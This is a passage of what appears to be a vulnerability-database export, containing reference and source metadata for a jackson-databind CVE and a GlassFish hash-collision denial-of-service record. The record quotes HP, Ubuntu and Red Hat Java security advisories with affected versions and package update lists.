"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7238"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_decision_manager/7.8/html/release_notes_for_red_hat_decision_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_build_of_thorntail/2.5/html/release_notes_for_thorntail_2.5/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2067"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=catrhoar.thorntail\u0026version=2.5.1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1729"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.rhsso\u0026downloadtype=distributions\u0026version=7.4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2020:1414"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2333"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform_continuous_delivery/19/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xeap-cd\u0026downloadtype=securitypatches\u0026version\u0019"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1732"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_process_automation_manager/7.8/html/release_notes_for_red_hat_process_automation_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhpam\u0026version=7.8.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xdata.grid\u0026downloadtype=securitypatches\u0026version=7.3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9547"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1745"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1757"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1695"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9548"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html/red_hat_data_grid_7.3_release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8840"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9546"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.7.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1953"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3192"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14195"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:1523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163657"
},
{
"db": "VULMON",
"id": "CVE-2020-11111"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1737"
},
{
"db": "NVD",
"id": "CVE-2020-11111"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163657",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-11111",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158650",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "160601",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157859",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157322",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1737",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-11111",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-03-31T00:00:00",
"db": "VULHUB",
"id": "VHN-163657",
"ident": null
},
{
"date": "2020-03-31T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11111",
"ident": null
},
{
"date": "2020-07-29T17:52:58",
"db": "PACKETSTORM",
"id": "158650",
"ident": null
},
{
"date": "2020-05-18T16:42:53",
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"date": "2020-12-17T18:09:37",
"db": "PACKETSTORM",
"id": "160601",
"ident": null
},
{
"date": "2020-05-28T16:22:46",
"db": "PACKETSTORM",
"id": "157859",
"ident": null
},
{
"date": "2020-07-29T17:53:05",
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"date": "2020-09-17T14:07:40",
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"date": "2020-07-29T00:05:59",
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"date": "2020-04-21T14:19:58",
"db": "PACKETSTORM",
"id": "157322",
"ident": null
},
{
"date": "2020-03-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1737",
"ident": null
},
{
"date": "2020-03-31T05:15:13.007000",
"db": "NVD",
"id": "CVE-2020-11111",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-12-10T00:00:00",
"db": "VULHUB",
"id": "VHN-163657",
"ident": null
},
{
"date": "2021-12-10T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11111",
"ident": null
},
{
"date": "2022-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1737",
"ident": null
},
{
"date": "2024-11-21T04:56:48.703000",
"db": "NVD",
"id": "CVE-2020-11111",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1737"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "FasterXML jackson-databind Code problem vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1737"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1737"
}
],
"trust": 0.6
}
}
VAR-201112-0123
Vulnerability from variot - Updated: 2026-03-09 22:56Oracle Glassfish 2.1.1, 3.0.1, and 3.1.1, as used in Communications Server 2.0, Sun Java System Application Server 8.1 and 8.2, and possibly other products, computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters, aka Oracle security ticket S0104869. Some programming language implementations do not sufficiently randomize their hash functions or provide means to limit key collision attacks, which can be leveraged by an unauthenticated attacker to cause a denial-of-service (DoS) condition. Oracle Glassfish Calculates the hash value of the form parameter without restricting the assumption of hash collision. (CPU Resource consumption ) There is a vulnerability that becomes a condition.A third party can send a large amount of crafted parameters to disrupt service operation. (CPU Resource consumption ) There is a possibility of being put into a state. Oracle GlassFish Server is prone to a denial-of-service vulnerability. An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests. Oracle GlassFish Server 3.1.1 and prior versions are vulnerable.
Release Date: 2012-03-26 Last Updated: 2012-04-02
Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities.
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.13 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2011-3563 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2011-5035 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-0497 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-0498 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-0499 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-0500 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-0501 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-0502 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2012-0503 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-0504 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2012-0505 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-0506 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2012-0507 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrades to resolve these vulnerabilities. The upgrades are available from the following location
http://www.hp.com/go/java
HP-UX B.11.11, B.11.23, B.11.31 JDK and JRE v6.0.14 or subsequent
MANUAL ACTIONS: Yes - Update For Java v6.0.13 and earlier, update to Java v6.0.14 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11 HP-UX B.11.23 HP-UX B.11.31 =========== Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS Jre60.JRE60-PA20 Jre60.JRE60-PA20-HS Jre60.JRE60-PA20W Jre60.JRE60-PA20W-HS Jdk60.JDK60-COM Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jdk60.JDK60-PA20 Jdk60.JDK60-PA20W action: install revision 1.6.0.14.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) 27 March 2012 Initial release Version:2 (rev.2) 2 April 2012 corrected CVE-2012-0507 score
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. HP has updated the Apache Tomcat and Oracle database software to address vulnerabilities affecting confidentiality, availability, and integrity. ============================================================================ Ubuntu Security Notice USN-1373-2 March 01, 2012
openjdk-6b18 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
Summary:
Multiple vulnerabilities in OpenJDK 6 for the ARM architecture have been fixed.
Software Description: - openjdk-6b18: Open Source Java implementation
Details:
USN 1373-1 fixed vulnerabilities in OpenJDK 6 in Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04 for all architectures except for ARM (armel). This provides the corresponding OpenJDK 6 update for use with the ARM (armel) architecture in Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. A remote attacker could cause a denial of service by sending special requests that trigger hash collisions predictably. This may be increased by adjusting the sun.net.httpserver.maxReqHeaders property. (CVE-2012-0497)
It was discovered that an off-by-one error exists in the Java ZIP file processing code. An attacker could us this to cause a denial of service through a maliciously crafted ZIP file. (CVE-2012-0507)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 11.04: icedtea-6-jre-cacao 6b18-1.8.13-0ubuntu1~11.04.1 icedtea-6-jre-jamvm 6b18-1.8.13-0ubuntu1~11.04.1 openjdk-6-jre 6b18-1.8.13-0ubuntu1~11.04.1 openjdk-6-jre-headless 6b18-1.8.13-0ubuntu1~11.04.1 openjdk-6-jre-zero 6b18-1.8.13-0ubuntu1~11.04.1
Ubuntu 10.10: icedtea-6-jre-cacao 6b18-1.8.13-0ubuntu1~10.10.1 openjdk-6-jre 6b18-1.8.13-0ubuntu1~10.10.1 openjdk-6-jre-headless 6b18-1.8.13-0ubuntu1~10.10.1 openjdk-6-jre-zero 6b18-1.8.13-0ubuntu1~10.10.1
Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b18-1.8.13-0ubuntu1~10.04.1 openjdk-6-jre 6b18-1.8.13-0ubuntu1~10.04.1 openjdk-6-jre-headless 6b18-1.8.13-0ubuntu1~10.04.1 openjdk-6-jre-zero 6b18-1.8.13-0ubuntu1~10.04.1
After a standard system update you need to restart any Java applications or applets to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.6.0-openjdk security update Advisory ID: RHSA-2012:0135-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0135.html Issue date: 2012-02-14 CVE Names: CVE-2011-3563 CVE-2011-3571 CVE-2011-5035 CVE-2012-0497 CVE-2012-0501 CVE-2012-0502 CVE-2012-0503 CVE-2012-0505 CVE-2012-0506 =====================================================================
- Summary:
Updated java-1.6.0-openjdk packages that fix several security issues are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
These packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Software Development Kit.
It was discovered that Java2D did not properly check graphics rendering objects before passing them to the native renderer. Malicious input, or an untrusted Java application or applet could use this flaw to crash the Java Virtual Machine (JVM), or bypass Java sandbox restrictions. (CVE-2012-0497)
It was discovered that the exception thrown on deserialization failure did not always contain a proper identification of the cause of the failure. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions. (CVE-2012-0505)
The AtomicReferenceArray class implementation did not properly check if the array was of the expected Object[] type. A malicious Java application or applet could use this flaw to bypass Java sandbox restrictions. (CVE-2011-3571)
It was discovered that the use of TimeZone.setDefault() was not restricted by the SecurityManager, allowing an untrusted Java application or applet to set a new default time zone, and hence bypass Java sandbox restrictions. (CVE-2012-0503)
The HttpServer class did not limit the number of headers read from HTTP requests. A remote attacker could use this flaw to make an application using HttpServer use an excessive amount of CPU time via a specially-crafted request. This update introduces a header count limit controlled using the sun.net.httpserver.maxReqHeaders property. The default value is 200. (CVE-2011-5035)
The Java Sound component did not properly check buffer boundaries. Malicious input, or an untrusted Java application or applet could use this flaw to cause the Java Virtual Machine (JVM) to crash or disclose a portion of its memory. (CVE-2011-3563)
A flaw was found in the AWT KeyboardFocusManager that could allow an untrusted Java application or applet to acquire keyboard focus and possibly steal sensitive information. (CVE-2012-0502)
It was discovered that the CORBA (Common Object Request Broker Architecture) implementation in Java did not properly protect repository identifiers on certain CORBA objects. This could have been used to modify immutable object data. (CVE-2012-0506)
An off-by-one flaw, causing a stack overflow, was found in the unpacker for ZIP files. A specially-crafted ZIP archive could cause the Java Virtual Machine (JVM) to crash when opened. (CVE-2012-0501)
Note: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website.
This erratum also upgrades the OpenJDK package to IcedTea6 1.10.6. Refer to the NEWS file, linked to in the References, for further information.
All users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259
- Bugs fixed (http://bugzilla.redhat.com/):
788606 - CVE-2011-5035 OpenJDK: HttpServer no header count limit (Lightweight HTTP Server, 7126960) 788624 - CVE-2012-0501 OpenJDK: off-by-one bug in ZIP reading code (JRE, 7118283) 788976 - CVE-2012-0503 OpenJDK: unrestricted use of TimeZone.setDefault() (i18n, 7110687) 788994 - CVE-2011-3571 OpenJDK: AtomicReferenceArray insufficient array type check (Concurrency, 7082299) 789295 - CVE-2011-3563 OpenJDK: JavaSound incorrect bounds check (Sound, 7088367) 789297 - CVE-2012-0502 OpenJDK: KeyboardFocusManager focus stealing (AWT, 7110683) 789299 - CVE-2012-0505 OpenJDK: incomplete info in the deserialization exception (Serialization, 7110700) 789300 - CVE-2012-0506 OpenJDK: mutable repository identifiers (CORBA, 7110704) 789301 - CVE-2012-0497 OpenJDK: insufficient checking of the graphics rendering object (2D, 7112642)
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm
